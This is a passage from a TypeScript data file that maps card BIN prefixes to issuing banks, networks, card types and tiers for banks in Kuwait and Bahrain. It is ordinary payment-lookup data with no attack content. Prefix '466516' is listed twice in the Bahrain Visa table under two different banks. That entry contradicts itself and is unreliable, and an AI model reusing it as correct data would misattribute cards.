  '419250': { bank: 'Doha Bank', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '419249': { bank: 'Doha Bank', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '441330': { bank: 'Doha Bank', network: 'Visa', type: 'Credit', tier: 'Standard' },
  // Al Rajhi (Kuwait branch)
  '458843': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '458842': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '458841': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '458840': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '458839': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '458838': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '458583': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '433863': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '406966': { bank: 'Al Rajhi Kuwait', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  // Bank of Kuwait and the Middle East (BKME)
  '468502': { bank: 'BKME', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '424337': { bank: 'BKME', network: 'Visa', type: 'Credit', tier: 'Classic' },
  // QNB Kuwait
  '494705': { bank: 'QNB Kuwait', network: 'Visa', type: 'Credit', tier: 'Standard' },
};

// ==================== بطاقات البنوك الكويتية - Mastercard ====================
export const KUWAIT_MASTERCARD_BINS: Record<string, BinInfo> = {
  // National Bank of Kuwait (NBK)
  '558883': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '552277': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '552050': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '541318': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '541313': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '541312': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '539819': { bank: 'NBK', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '537790': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '522888': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '519130': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '515504': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '519916': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Executive Business' },
  '533215': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '533607': { bank: 'NBK', network: 'Mastercard', type: 'Debit', tier: 'Platinum Travel' },
  '537272': { bank: 'NBK', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '543363': { bank: 'NBK', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '547640': { bank: 'NBK', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '559286': { bank: 'NBK', network: 'Mastercard', type: 'Debit', tier: 'Platinum Travel' },
  // Kuwait Finance House (KFH)
  '545408': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '544240': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '544239': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '531483': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '526450': { bank: 'KFH', network: 'Mastercard', type: 'Debit', tier: 'Business' },
  '517957': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '516678': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '516457': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '510546': { bank: 'KFH', network: 'Mastercard', type: 'Credit', tier: 'World' },
  // Boubyan Bank
  '533746': { bank: 'Boubyan', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '528540': { bank: 'Boubyan', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '510692': { bank: 'Boubyan', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  // Burgan Bank
  '552299': { bank: 'Burgan', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '540759': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '532493': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '532422': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '532341': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '532339': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '532337': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '532335': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '531611': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '528803': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '527526': { bank: 'Burgan', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '527525': { bank: 'Burgan', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '527307': { bank: 'Burgan', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '524190': { bank: 'Burgan', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '518549': { bank: 'Burgan', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '518521': { bank: 'Burgan', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  // Gulf Bank
  '559582': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '559475': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '559320': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '552078': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '552007': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '545424': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '544675': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '542859': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '541107': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '540261': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '536524': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '535966': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '533788': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '533769': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '532675': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '531644': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Titanium' },
  '531471': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '531470': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '531329': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '527262': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '526206': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Business' },
  '517458': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Titanium' },
  '517419': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'World' },
  '516647': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '513665': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '533770': { bank: 'Gulf Bank', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Business' },
  // Commercial Bank of Kuwait (CBK)
  '559324': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '548277': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '548184': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '548183': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '544290': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '541855': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '537015': { bank: 'CBK', network: 'Mastercard', type: 'Debit', tier: 'Unembossed' },
  '533757': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '532672': { bank: 'CBK', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '529074': { bank: 'CBK', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '526597': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '521371': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '521175': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '516353': { bank: 'CBK', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '516334': { bank: 'CBK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Al Ahli Bank of Kuwait (ABK)
  '556638': { bank: 'ABK', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '544622': { bank: 'ABK', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '544621': { bank: 'ABK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '529567': { bank: 'ABK', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '529072': { bank: 'ABK', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '524114': { bank: 'ABK', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '522869': { bank: 'ABK', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '544623': { bank: 'ABK', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Kuwait International Bank (KIB)
  '559593': { bank: 'KIB', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '559472': { bank: 'KIB', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '554134': { bank: 'KIB', network: 'Mastercard', type: 'Debit', tier: 'World Debit' },
  '539281': { bank: 'KIB', network: 'Mastercard', type: 'Debit', tier: 'Titanium Debit' },
  '533778': { bank: 'KIB', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '517893': { bank: 'KIB', network: 'Mastercard', type: 'Debit', tier: 'Gold' },
  '536968': { bank: 'KIB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Warba Bank
  '559459': { bank: 'Warba', network: 'Mastercard', type: 'Debit', tier: 'Unembossed' },
  '536325': { bank: 'Warba', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '532749': { bank: 'Warba', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  // Ahli United Bank (AUB)
  '554503': { bank: 'AUB', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '552272': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '547045': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '540281': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '537016': { bank: 'AUB', network: 'Mastercard', type: 'Debit', tier: 'Unembossed' },
  '536322': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '532674': { bank: 'AUB', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '530502': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '530348': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '527799': { bank: 'AUB', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Reloadable' },
  '521533': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '517735': { bank: 'AUB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Qatar National Bank (QNB) - Kuwait
  '559307': { bank: 'QNB Kuwait', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '524745': { bank: 'QNB Kuwait', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '524221': { bank: 'QNB Kuwait', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '521020': { bank: 'QNB Kuwait', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '535307': { bank: 'QNB Kuwait', network: 'Mastercard', type: 'Debit', tier: 'World' },
  // Doha Bank (Kuwait branch)
  '512434': { bank: 'Doha Bank', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '520419': { bank: 'Doha Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '518917': { bank: 'Doha Bank', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  // Bank of Kuwait and the Middle East (BKME)
  '528006': { bank: 'BKME', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
};

// ==================== بطاقات البنوك البحرينية - Visa ====================
export const BAHRAIN_VISA_BINS: Record<string, BinInfo> = {
  // National Bank of Bahrain (NBB) - بنك البحرين الوطني
  '412478': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '414444': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '437397': { bank: 'NBB', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '449999': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '450828': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '450829': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '458888': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '464084': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '479090': { bank: 'NBB', network: 'Visa', type: 'Credit', tier: 'Standard' },
  // Bank of Bahrain and Kuwait (BBK) - بنك البحرين والكويت
  '455013': { bank: 'BBK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '455012': { bank: 'BBK', network: 'Visa', type: 'Debit', tier: 'Traditional' },
  '440250': { bank: 'BBK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '455002': { bank: 'BBK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '444030': { bank: 'BBK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '444031': { bank: 'BBK', network: 'Visa', type: 'Credit', tier: 'Premier' },
  '444032': { bank: 'BBK', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '447525': { bank: 'BBK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  // Ahli United Bank (AUB) - البنك الأهلي المتحد
  '414619': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '415078': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '415079': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '428973': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '432118': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '466507': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '466516': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '468546': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '468547': { bank: 'AUB Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  // Al Salam Bank - بنك السلام
  '456784': { bank: 'Al Salam Bank', network: 'Visa', type: 'Debit', tier: 'Signature' },
  '437335': { bank: 'Al Salam Bank', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '410538': { bank: 'Al Salam Bank', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '420179': { bank: 'Al Salam Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  // Bahrain Islamic Bank (BisB) - بنك البحرين الإسلامي
  '403207': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '407710': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '407775': { bank: 'BisB', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '413742': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '413743': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Premier' },
  '413744': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '413745': { bank: 'BisB', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '415286': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '415656': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '438990': { bank: 'BisB', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '438996': { bank: 'BisB', network: 'Visa', type: 'Debit', tier: 'Premier' },
  '454522': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  // Khaleeji Commercial Bank (KHCB) - المصرف الخليجي التجاري
  '471400': { bank: 'KHCB', network: 'Visa', type: 'Credit', tier: 'Corporate' },
  '471399': { bank: 'KHCB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '471398': { bank: 'KHCB', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '471397': { bank: 'KHCB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '415464': { bank: 'KHCB', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '437334': { bank: 'KHCB', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '438997': { bank: 'KHCB', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '472295': { bank: 'KHCB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  // Kuwait Finance House Bahrain (KFH Bahrain) - بيت التمويل الكويتي البحرين
  '431364': { bank: 'KFH Bahrain', network: 'Visa', type: 'Credit', tier: 'Traditional' },
  '431365': { bank: 'KFH Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '490496': { bank: 'KFH Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '484713': { bank: 'KFH Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '481789': { bank: 'KFH Bahrain', network: 'Visa', type: 'Credit', tier: 'Signature' },
  // Citibank Bahrain - سيتي بنك البحرين
  '466516': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '458269': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '458268': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '458267': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '421613': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Debit', tier: 'Gold' },
  '492053': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '436798': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '421612': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Debit', tier: 'Traditional' },
  // HSBC Bahrain - إتش إس بي سي البحرين
  '484837': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '484836': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '484835': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '484834': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '484833': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '484832': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '455393': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '453931': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '453930': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '445813': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '432061': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '423211': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '423210': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '423209': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '412540': { bank: 'HSBC Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  // Standard Chartered Bahrain - ستاندرد تشارترد البحرين
  '405749': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '412587': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '413861': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '416065': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '416066': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Premier' },
  '458231': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '460041': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '465961': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '484081': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '484082': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '484083': { bank: 'Standard Chartered Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  // Arab Bank Bahrain - البنك العربي البحرين
  '442130': { bank: 'Arab Bank Bahrain', network: 'Visa', type: 'Credit', tier: 'Purchasing' },
  // CrediMax B.S.C. - كريدي ماكس
  '417075': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '423824': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '480935': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '493838': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '493814': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Corporate' },
  '456391': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '440309': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '437535': { bank: 'CrediMax', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '406139': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '406129': { bank: 'CrediMax', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  // BMI Bank B.S.C. - بنك BMI
  '408365': { bank: 'BMI Bank', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '408366': { bank: 'BMI Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '416813': { bank: 'BMI Bank', network: 'Visa', type: 'Debit', tier: 'Electron' },
  // Habib Bank - بنك حبيب
  '458487': { bank: 'Habib Bank', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '472478': { bank: 'Habib Bank', network: 'Visa', type: 'Debit', tier: 'Standard' },
  // ICICI Bank Bahrain
  '403641': { bank: 'ICICI Bank Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '421635': { bank: 'ICICI Bank Bahrain', network: 'Visa', type: 'Debit', tier: 'Classic' },
  // Mashreq Bank Bahrain - بنك المشرق
  '428345': { bank: 'Mashreq Bank Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  // National Bank of Kuwait Bahrain
  '402639': { bank: 'NBK Bahrain', network: 'Visa', type: 'Debit', tier: 'Traditional' },
  '418766': { bank: 'NBK Bahrain', network: 'Visa', type: 'Credit', tier: 'Standard' },
  // Arab Financial Services - الخدمات المالية العربية
  '417215': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '417216': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Premier' },
  '426227': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '426228': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Premier' },
  '428113': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Premier' },
  '428114': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '428115': { bank: 'Arab Financial Services', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '437336': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '438991': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Business' },
  '438992': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Business' },
  '438993': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Business' },
  '438994': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Business' },
  '438995': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Gold Premium' },
  '449630': { bank: 'Arab Financial Services', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '455050': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Business' },
  '456060': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Standard' },
  // Batelco Financial Services - خدمات بتلكو المالية
  '402627': { bank: 'Batelco Financial', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  // Credit Libanais Bahrain
  '419170': { bank: 'Credit Libanais', network: 'Visa', type: 'Credit', tier: 'Traditional' },
  '419171': { bank: 'Credit Libanais', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '422121': { bank: 'Credit Libanais', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '428674': { bank: 'Credit Libanais', network: 'Visa', type: 'Debit', tier: 'Traditional' },
  // United Bank Ltd Bahrain
  '432227': { bank: 'United Bank Bahrain', network: 'Visa', type: 'Debit', tier: 'Classic' },
  // Housing Bank for Trade & Finance Bahrain
  '494005': { bank: 'Housing Bank Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '494004': { bank: 'Housing Bank Bahrain', network: 'Visa', type: 'Credit', tier: 'Gold' },
  // NBAD - National Bank of Abu Dhabi Bahrain
  '400208': { bank: 'NBAD Bahrain', network: 'Visa', type: 'Debit', tier: 'Electron' },
  // BisB - Additional BINs
  '407470': { bank: 'BisB', network: 'Visa', type: 'Credit', tier: 'Corporate' },
  // BankMuscat International Bahrain
  '410537': { bank: 'BankMuscat Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  // Al Salam Bank - Additional BINs
  '415537': { bank: 'Al Salam Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '439141': { bank: 'Al Salam Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  // Emirates NBD Bahrain
  '417892': { bank: 'Emirates NBD Bahrain', network: 'Visa', type: 'Debit', tier: 'Classic' },
  // Arab Bank - Additional BINs
  '432585': { bank: 'Arab Bank Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '432586': { bank: 'Arab Bank Bahrain', network: 'Visa', type: 'Credit', tier: 'Premier' },
  '458591': { bank: 'Arab Bank Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '474719': { bank: 'Arab Bank Bahrain', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '474735': { bank: 'Arab Bank Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  // Arab Financial Services - Additional Visa BINs
  '438998': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Gold Premium' },
  '438999': { bank: 'Arab Financial Services', network: 'Visa', type: 'Credit', tier: 'Gold Premium' },
  // BBK - Additional BINs
  '439956': { bank: 'BBK', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '441555': { bank: 'BBK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '457555': { bank: 'BBK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '488978': { bank: 'BBK', network: 'Visa', type: 'Debit', tier: 'Infinite' },
  // CrediMax - Additional Visa BINs
  '457852': { bank: 'CrediMax', network: 'Visa', type: 'Debit', tier: 'Classic' },
  // Citibank - Additional BINs
  '458241': { bank: 'Citibank Bahrain', network: 'Visa', type: 'Credit', tier: 'Platinum' },
};

// ==================== بطاقات البنوك البحرينية - Mastercard ====================
export const BAHRAIN_MASTERCARD_BINS: Record<string, BinInfo> = {
  // National Bank of Bahrain (NBB) - بنك البحرين الوطني
  '527432': { bank: 'NBB', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
